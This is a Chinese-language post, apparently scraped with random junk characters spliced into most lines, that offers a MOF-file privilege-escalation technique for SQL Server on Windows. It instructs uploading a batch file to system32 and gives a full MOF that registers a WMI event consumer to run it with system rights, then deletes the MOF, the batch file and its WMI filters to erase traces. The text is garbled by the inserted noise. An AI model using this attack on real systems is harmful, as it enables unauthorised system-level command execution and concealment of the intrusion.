这个sql提权MOF需要运行 system下的文件,不能定义路径。
- } L* H) N1 a6 f H% O* y" n需要将要运行的命令写入到bat上传到system32目录,然后执行。
7 x5 |. l: ? ?! C% z y: A( h; f8 e* Y, v7 P' B
这个sql提权MOF需要运行 system下的文件,不能定义路径。
5 j) v! k; y9 r# g2 N需要将要运行的命令写入到bat上传到system32目录,然后执行。4 l3 ^* k5 f4 R9 C) O2 T, k% ^% k
' E; ~, y" r: U9 V P
#pragma' u9 j# y$ ~6 l$ l. w( o6 z* W3 u
namespace("\\\\.\\root\\cimv2")8 `8 Y& m i1 W( ^- k0 C# U& s8 w! o' d
class V) J2 I z4 D2 H# P2 T
MyClass547& m( d- W% M i& q* t3 [; k
{ [key]' w: L. ]* J/ }- h; t/ A! n; ]: ?
string
& e* z- ?% {0 }" X/ J Name;
. ?. B/ P- Y# r9 Q* ?0 W, d) ? };+ l/ G# [2 a) N/ v: T
class1 u) e8 B" c% |! M1 ~3 Z
ActiveScriptEventConsumer
: b0 ^2 r6 J: @; v% ~ : __EventConsumer { [key]/ M5 S8 ]) g+ y8 H! k1 ~; g* o& J1 z
string
5 q3 o9 e6 M6 @% Q, K. h1 q' S0 L Name; [not_null] Z, {* T" |# c
string
+ s( S$ Y1 f7 }2 ?* t7 h6 @7 a ScriptingEngine; string+ N5 r* O2 Y" P. x- `
ScriptFileName; [template]
$ Z7 M8 X# ]/ F2 n( W( t# X string( H# C% O3 @ r# N! A) Y- D: U
ScriptText; uint32 KillTimeout;
( s7 W: p- S2 S9 O: A }; instance of __Win32Provider as $P {; `- V1 N" q6 C/ m8 |
Name
2 N+ q+ o0 C B' A =
; M f, m9 E" s, V( }+ K "ActiveScriptEventConsumer"; CLSID =& [# o5 O- M7 U- W
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";6 s2 j& ^! B: E3 V
PerUserInitialization- O( h# A. Z! Y+ X! I
= TRUE;5 J, k7 s Q3 G% ]+ o
}; instance of __EventConsumerProviderRegistration { Provider
: u! y/ E& q9 y% a) R = $P; ConsumerClassNames v( f' n- ~* v
=) p5 v5 I6 j3 E, ]- C3 E( a3 M
{"ActiveScriptEventConsumer"};
6 D" T0 U0 I/ ? };' `8 q3 u: i$ a) @4 m
Instance of ActiveScriptEventConsumer
( X% T) u7 a8 W2 i as $cons { Name
. b3 |$ R, M9 e, V% v0 i$ | =+ n E# R! q) _+ l* y0 o
"ASEC"; ScriptingEngine+ {' J' N4 f# w& z7 b$ e: _" q
=
) Z7 G! R' N" R V2 @0 I, ~ "JScript"; ScriptText
: e- k& V/ O1 K ^- R1 H; h3 K =
! } B; B* t( o6 L6 s% u8 g$ O "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };5 r% B. [9 c, m I3 T
Instance of ActiveScriptEventConsumer
* y1 n3 K8 N( v- C" C! h/ w as $cons2 { Name1 A6 ]2 | }. v# Y' L
=" H' a3 o$ e2 K+ f5 |- h
"qndASEC"; ScriptingEngine
$ E4 Y0 B3 `: I' R5 T! c/ D =5 k: T" h( \1 h% S4 S% N
"JScript"; ScriptText
: ^8 ?+ P' q+ d' R2 V4 S! { =0 Z+ V0 t; z* m! J4 n
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";: z$ G5 f. F" N9 i
}; instance of __EventFilter as $Filt { Name
! E9 M5 o6 Z( a! Q =
& x. A |, J" ` "instfilt"; Query, ?0 e$ v, B" H# F, i
=
$ i5 j/ X. _# x L "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage/ d. |$ q# ?) N3 I s
=( w) }, i) @( ^' Z
"WQL"; }; instance of __EventFilter as $Filt2 { Name
8 l- [; y, w3 E =
* X9 J, r, J d "qndfilt"; Query' U# C7 j5 L! b! G* Y* x
=
7 y2 I0 @2 h' b3 |8 C5 _% w, v "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage: @5 k p, M) E7 x9 K; U, U8 w
=
" f# z( F0 T" H. k, N "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer6 c9 ^# L# `( a
= $cons; Filter7 D N+ }' s) F* V# D @& z9 S) b
= $Filt;
* b( g7 H. P' L6 q; k: J0 M }; instance of __FilterToConsumerBinding as $bind2 { Consumer+ _: b! g9 H3 a0 n; C
= $cons2; Filter
+ J I: S& D1 g1 L K9 z3 P = $Filt2;
+ C6 F+ t S1 h9 I- V7 z. W# W* N, g }; instance of MyClass547
9 f! p1 U5 u# o" s7 l9 F1 t as $MyClass { Name9 D( N) _! N9 z) @3 q( E
=
. y/ d; ?) @: \1 W "ClassConsumer";; W5 U/ Q" ~7 b- h
}; |